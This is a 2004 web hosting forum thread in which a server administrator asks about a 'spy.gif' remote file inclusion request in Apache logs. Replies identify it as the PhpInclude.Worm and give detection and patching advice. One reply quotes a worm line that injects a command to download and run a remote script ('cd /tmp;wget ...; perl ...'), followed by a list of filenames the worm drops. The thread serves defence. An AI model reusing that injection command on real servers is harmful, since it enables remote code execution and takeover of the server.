The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Worm? http://www.visualcoders.net/spy.gif?

Discussion in 'General Discussion' started by yuga, Dec 27, 2004.

  1. yuga

    yuga Active Member

    Joined:
    Jan 8, 2004
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    1
    One of my domains is getting this in the Apache logs: p=http://www.visualcoders.net/spy.gif?

    I heard it is a worm or something but could not find any reference in Google. Can anybody help me? My server is running RHES 3.0, Cpanel/WHM and PHP was already upgraded to v 4.3.10.
     
  2. mike_r

    mike_r Well-Known Member

    Joined:
    Nov 26, 2002
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    6
    "The following exploit/worm (PhpInclude.Worm) attacks any CGI it can find using Google and Yahoo and tries to cause them to include an arbitrary PHP file that is then executed becoming the sibling of the worm."

    $lista1 = 'http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl php.txt';
    # Other filenames included with this and other variants :
    # adfkgnnodfijg
    # bot
    # bot.txt
    # bot.txt.1
    # dry.scp
    # ssh.a
    # terrorbot.txt
    # terrorbot.txt.1
    # terrorworm.txt
    # terrorworm.txt.1
    # unbot.txt
    # unbot.txt.1
    # unbot.txt.2
    # unbot.txt.3
    # unworm.txt
    # unworm.txt.1
    # unworm.txt.2
    # unworm.txt.3
    # worm1.txt
    # worm.txt
    # worm.txt.1

    So be ware of those files..
     
  3. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    check your /tmp | /var/tmp | /usr/local/apache/proxy for the above mentioned worm files...

    Can also do a find or locate for them in case they got put elsewhere on the filesystem.

    Also check your running processes for perl processes.
     
  4. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    This technic can also be seen when a user has an unpatched phpbb forum, ensure your forums have been updated.
     
Loading...

Share This Page